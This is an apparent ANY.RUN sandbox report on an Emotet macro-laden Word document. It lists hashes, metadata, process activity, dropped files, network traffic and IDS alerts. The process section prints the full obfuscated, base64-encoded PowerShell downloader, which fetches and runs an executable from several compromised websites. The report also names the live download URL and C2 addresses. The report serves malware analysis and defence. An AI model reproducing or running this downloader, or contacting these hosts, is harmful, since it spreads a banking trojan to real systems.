analyze malware
  • Huge database of samples and IOCs
  • Custom VM setup
  • Unlimited submissions
  • Interactive approach
Sign up, it’s free
File name:

File-7759-1758851631.doc

Full analysis: https://app.any.run/tasks/1497800b-7659-4ab9-bd1b-e54748cd4280
Verdict: Malicious activity
Threats:

Emotet is one of the most dangerous trojans ever created. Over the course of its lifetime, it was upgraded to become a very destructive malware. It targets mostly corporate victims but even private users get infected in mass spam email campaigns.

Analysis date: May 24, 2019, 18:38:51
OS: Windows 7 Professional Service Pack 1 (build: 7601, 32 bit)
Tags:
macros
macros-on-open
generated-doc
loader
emotet
emotet-doc
Indicators:
MIME: application/msword
File info: Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.1, Code page: 1252, Title: Tasty Soft Mouse withdrawal monitor, Subject: Automotive, Author: Ivah Krajcik, Comments: Ergonomic Cotton Soap Licensed, Template: Normal.dotm, Revision Number: 1, Name of Creating Application: Microsoft Office Word, Create Time/Date: Fri May 24 14:58:00 2019, Last Saved Time/Date: Fri May 24 14:58:00 2019, Number of Pages: 1, Number of Words: 17, Number of Characters: 97, Security: 0
MD5:

94CF785576FC35776B5468066087E722

SHA1:

643EDE588E4C8CAB90B17579664B7E38792A2045

SHA256:

FF9A18857B7F818301CB1E49D0C146F013F3B2F0116605F1D48B97EC80ED1433

SSDEEP:

3072:a77HUUUUUUUUUUUUUUUUUUUTkOQePu5U8qB+vCmhGTp1plceHl:a77HUUUUUUUUUUUUUUUUUUUT52V+Nmhy

ANY.RUN is an interactive service which provides full access to the guest system. Information in this report could be distorted by user actions and is provided for user acknowledgement as it is. ANY.RUN does not guarantee maliciousness or safety of the content.
  • MALICIOUS

    • Application was dropped or rewritten from another process

      • 441.exe (PID: 2904)
      • 441.exe (PID: 3860)
      • soundser.exe (PID: 2236)
      • soundser.exe (PID: 3836)
    • Downloads executable files from the Internet

      • powershell.exe (PID: 2788)
    • Emotet process was detected

      • soundser.exe (PID: 3836)
  • SUSPICIOUS

    • Executed via WMI

      • powershell.exe (PID: 2788)
    • Creates files in the user directory

      • powershell.exe (PID: 2788)
    • PowerShell script executed

      • powershell.exe (PID: 2788)
    • Executable content was dropped or overwritten

      • 441.exe (PID: 3860)
      • powershell.exe (PID: 2788)
    • Application launched itself

      • 441.exe (PID: 2904)
      • soundser.exe (PID: 3836)
    • Connects to server without host name

      • soundser.exe (PID: 2236)
    • Starts itself from another location

      • 441.exe (PID: 3860)
  • INFO

    • Reads Microsoft Office registry keys

      • WINWORD.EXE (PID: 3948)
    • Creates files in the user directory

      • WINWORD.EXE (PID: 3948)
Find more information about signature artifacts and mapping to MITRE ATT&CK™ MATRIX at the full report
No Malware configuration.

TRiD

.doc | Microsoft Word document (54.2)
.doc | Microsoft Word document (old ver.) (32.2)

EXIF

FlashPix

CompObjUserTypeLen: 32
CompObjUserType: Microsoft Word 97-2003 Document
Title: Tasty Soft Mouse withdrawal monitor
Subject: Automotive
Author: Ivah Krajcik
Keywords: -
Comments: Ergonomic Cotton Soap Licensed
Template: Normal.dotm
LastModifiedBy: -
RevisionNumber: 1
Software: Microsoft Office Word
TotalEditTime: -
CreateDate: 2019:05:24 13:58:00
ModifyDate: 2019:05:24 13:58:00
Pages: 1
Words: 17
Characters: 97
Security: None
CodePage: Windows Latin 1 (Western European)
Company: Jast, Nader and Gorczany
Lines: 1
Paragraphs: 1
CharCountWithSpaces: 113
AppVersion: 16
ScaleCrop: No
LinksUpToDate: No
SharedDoc: No
HyperlinksChanged: No
TitleOfParts: -
HeadingPairs:
  • Title
  • 1
Manager: Hackett
No data.
screenshotscreenshotscreenshot
All screenshots are available in the full report
All screenshots are available in the full report
Total processes
40
Monitored processes
6
Malicious processes
4
Suspicious processes
0

Behavior graph

Click at the process to see the details
start drop and start drop and start winword.exe no specs powershell.exe 441.exe no specs 441.exe #EMOTET soundser.exe no specs soundser.exe

Process information

PID
CMD
Path
Indicators
Parent process
3948"C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\admin\AppData\Local\Temp\File-7759-1758851631.doc"C:\Program Files\Microsoft Office\Office14\WINWORD.EXEexplorer.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Microsoft Word
Version:
14.0.6024.1000
2788powershell -nop -e JABwAEEAVwAzAF8AdwBKAGoAPQAnAEUAWABMAGIAdwB3AG0AJwA7ACQASAA3AFMAdgBVAHAAIAA9ACAAJwA0ADQAMQAnADsAJAB0ADgAdgBGAHIAawBuAFEAPQAnAFgAMwA2AHMAegBTAGMAbgAnADsAJABaAHAAQwBwADgAaQBCAEgAPQAkAGUAbgB2ADoAdQBzAGUAcgBwAHIAbwBmAGkAbABlACsAJwBcACcAKwAkAEgANwBTAHYAVQBwACsAJwAuAGUAeABlACcAOwAkAGEAWAB6AG4AQwBJAD0AJwBHAGgASgA0AEgASQAwADEAJwA7ACQAbQBEAEcAawBGAEYAPQAmACgAJwBuACcAKwAnAGUAdwAtAG8AYgBqACcAKwAnAGUAYwB0ACcAKQAgAE4ARQBgAFQALgBXAGUAYgBgAEMATABpAEUAYABOAHQAOwAkAHEAYgB6AE4ATQB3AHcAPQAnAGgAdAB0AHAAOgAvAC8AdwB3AHcALgBtAGEAaQBzAG8AbgBtAGEAbgBvAHIALgBjAG8AbQAvAHcAcAAtAGMAbwBuAHQAZQBuAHQALwB1AG4AUgBwAEYAWQBDAHcARgBmAC8AQABoAHQAdABwADoALwAvADQAZwBzAHQAYQByAHQAdQBwAC4AYwBvAG0ALwB3AHAALQBjAG8AbgB0AGUAbgB0AC8AdwBvAHQAZAByAG4AUABHAC8AQABoAHQAdABwADoALwAvAGIAbwBuAGUAcwBwAGUAYwBpAGEAbABpAHMAdABzAGkAbgBtAGEAbgBnAGEAbABvAHIAZQAuAGMAbwBtAC8AaQBtAGEAZwBlAHMALwBlAGgAYgBpAG0AOQBxAF8AcQBnAHIAZQA1AG0AYwBqAGYAOQAtADYAOQA2ADAAOAAvAEAAaAB0AHQAcAA6AC8ALwBoAG8AbgBkAGEAdABoAHUAZABvAC4AYwBvAG0ALwB3AHAALQBzAG4AYQBwAHMAaABvAHQAcwAvAGMAbgB3AG4AdwBzAHEAaABfADUANQBjADkAcQAtADkAMgA4ADcANAA2AC8AQABoAHQAdABwADoALwAvAGIAZQB0AGEAYgBhAG4AZwBsAGEAZABlAHMAaAAuAGMAbwBtAC8AdwBwAC0AaQBuAGMAbAB1AGQAZQBzAC8AMgA0AHQAaABmAHMAdgBvAHkAXwB0AHkAMABpAHgAaABtAC0ANQA5AC8AJwAuAFMAcABsAGkAdAAoACcAQAAnACkAOwAkAEoAWgBKADUAMQBzAD0AJwBZAGQAbQBqAFQAMAAnADsAZgBvAHIAZQBhAGMAaAAoACQAbAB3AGgAMgBpAG0AIABpAG4AIAAkAHEAYgB6AE4ATQB3AHcAKQB7AHQAcgB5AHsAJABtAEQARwBrAEYARgAuAEQAbwB3AG4AbABPAEEARABGAGkAbABFACgAJABsAHcAaAAyAGkAbQAsACAAJABaAHAAQwBwADgAaQBCAEgAKQA7ACQAUABpAEkASQBDAGkAPQAnAEgATgB6AGoAdQB3AHQAXwAnADsASQBmACAAKAAoACYAKAAnAEcAZQB0AC0ASQAnACsAJwB0ACcAKwAnAGUAbQAnACkAIAAkAFoAcABDAHAAOABpAEIASAApAC4ATABlAG4ARwB0AGgAIAAtAGcAZQAgADIAMAA4ADAAMQApACAAewBbAEQAaQBhAGcAbgBvAHMAdABpAGMAcwAuAFAAcgBvAGMAZQBzAHMAXQA6ADoAUwB0AEEAcgBUACgAJABaAHAAQwBwADgAaQBCAEgAKQA7ACQATgBIAG0AaQBHAHAAegA9ACcARgBsAE8ASwBIADEAMQAnADsAYgByAGUAYQBrADsAJABGAE8AbgA0AFAAdgBtADUAPQAnAGoAdgBuAGkASABoAGYAJwB9AH0AYwBhAHQAYwBoAHsAfQB9ACQAdwBDAGQATgA1ADkAegBoAD0AJwBXADYAOABPAFIANwA4ACcAC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
wmiprvse.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows PowerShell
Exit code:
0
Version:
6.1.7600.16385 (win7_rtm.090713-1255)
2904"C:\Users\admin\441.exe" C:\Users\admin\441.exepowershell.exe
User:
admin
Company:
VMware, Inc.
Integrity Level:
MEDIUM
Description:
VMware Resolution Set
Exit code:
0
Version:
9.6.2.31837
3860--9eb38dafC:\Users\admin\441.exe
441.exe
User:
admin
Company:
VMware, Inc.
Integrity Level:
MEDIUM
Description:
VMware Resolution Set
Exit code:
0
Version:
9.6.2.31837
3836"C:\Users\admin\AppData\Local\soundser\soundser.exe"C:\Users\admin\AppData\Local\soundser\soundser.exe
441.exe
User:
admin
Company:
VMware, Inc.
Integrity Level:
MEDIUM
Description:
VMware Resolution Set
Exit code:
0
Version:
9.6.2.31837
2236--3ab57678C:\Users\admin\AppData\Local\soundser\soundser.exe
soundser.exe
User:
admin
Company:
VMware, Inc.
Integrity Level:
MEDIUM
Description:
VMware Resolution Set
Version:
9.6.2.31837
Total events
1 690
Read events
1 209
Write events
0
Delete events
0

Modification events

No data
Executable files
2
Suspicious files
2
Text files
0
Unknown types
9

Dropped files

PID
Process
Filename
Type
3948WINWORD.EXEC:\Users\admin\AppData\Local\Temp\CVR3E83.tmp.cvr
MD5:
SHA256:
2788powershell.exeC:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\J2U8RJOFH1RS1CTPR5IP.temp
MD5:
SHA256:
3948WINWORD.EXEC:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\281D6261.wmfwmf
MD5:184A881C43C32297F194764ABBAA2B8C
SHA256:EE2B30A208BB5BA80AA9B0E90656FBA7F997B360627D06F45EBFE03CBC66296C
3948WINWORD.EXEC:\Users\admin\AppData\Local\Temp\Word8.0\MSForms.exdtlb
MD5:88E0FDAC51BE8CD88823EE9CED442B44
SHA256:3C559433287E3AB8E21AE3E2D70A4ED3D6300A2288C2B6DB4601AB7BB8F8657F
3948WINWORD.EXEC:\Users\admin\AppData\Roaming\Microsoft\Templates\~$Normal.dotmpgc
MD5:B19FF5CEFD1DA5D0F2805A945B570C3C
SHA256:F75A592B67565D406D9D7F15EC8C276CD6D0D5E54AD5EF87413F565E44175FC9
3948WINWORD.EXEC:\Users\admin\AppData\Local\Temp\~$le-7759-1758851631.docpgc
MD5:919E584A721C4C7318641218302B2AD7
SHA256:86268AA43D47D9C9302E500F189109E6480DA5A01266F03ECC21CC62980276B5
3948WINWORD.EXEC:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\F2ECCF2C.wmfwmf
MD5:C0BE899A2F7960FE616AFED86D4F2A35
SHA256:4F91A8E0FEB18392C238C4D6B37525582E209910890FB432F0E793446D4A42A9
2788powershell.exeC:\Users\admin\441.exeexecutable
MD5:1D015AC254436AA310322C7D96A9088B
SHA256:7AFE208A208B852FC2E40E66FD00FA8FD80C1CA080AED1075FDB657896DD6EEB
3948WINWORD.EXEC:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\BE81FA1A.wmfwmf
MD5:360AD680C2F9C137D08AAAE304FB4B8B
SHA256:6E4A989C3C559FAA2DEEF0D2B5879D1AB3C59A6B7D08D1ABF4D01DAAB5590DEC
3948WINWORD.EXEC:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\EBDE0D3D.wmfwmf
MD5:95B5BED7F2DADDF367D636778CE3C9E5
SHA256:90325BBA44EEACA0DDB89CE8E0792505CD7EE37A788AF61B9D4080E8D7006ECD
Download PCAP, analyze network streams, HTTP content and a lot more at the full report
HTTP(S) requests
4
TCP/UDP connections
4
DNS requests
1
Threats
0

HTTP requests

PID
Process
Method
HTTP Code
IP
URL
CN
Type
Size
Reputation
2236
soundser.exe
POST
76.86.20.103:80
http://76.86.20.103/walk/teapot/ringin/merge/
US
malicious
2236
soundser.exe
POST
5.67.205.99:80
http://5.67.205.99/balloon/acquire/
GB
malicious
2788
powershell.exe
GET
200
138.197.32.141:80
http://www.maisonmanor.com/wp-content/unRpFYCwFf/
US
executable
107 Kb
suspicious
2236
soundser.exe
POST
144.139.247.220:80
http://144.139.247.220/add/scripts/ringin/
AU
malicious
Download PCAP, analyze network streams, HTTP content and a lot more at the full report

Connections

PID
Process
IP
Domain
ASN
CN
Reputation
2236
soundser.exe
144.139.247.220:80
Telstra Pty Ltd
AU
malicious
2788
powershell.exe
138.197.32.141:80
www.maisonmanor.com
Digital Ocean, Inc.
US
suspicious
2236
soundser.exe
5.67.205.99:80
Sky UK Limited
GB
malicious
2236
soundser.exe
76.86.20.103:80
Time Warner Cable Internet LLC
US
malicious

DNS requests

Domain
IP
Reputation
www.maisonmanor.com
  • 138.197.32.141
suspicious

Threats

PID
Process
Class
Message
2788
powershell.exe
Potential Corporate Privacy Violation
ET POLICY PE EXE or DLL Windows file download HTTP
2788
powershell.exe
Potentially Bad Traffic
ET INFO Executable Retrieved With Minimal HTTP Headers - Potential Second Stage Download
2788
powershell.exe
Misc activity
ET INFO EXE - Served Attached HTTP
2788
powershell.exe
Misc activity
ET INFO EXE IsDebuggerPresent (Used in Malware Anti-Debugging)
2788
powershell.exe
Misc activity
ET INFO EXE CheckRemoteDebuggerPresent (Used in Malware Anti-Debugging)
No debug info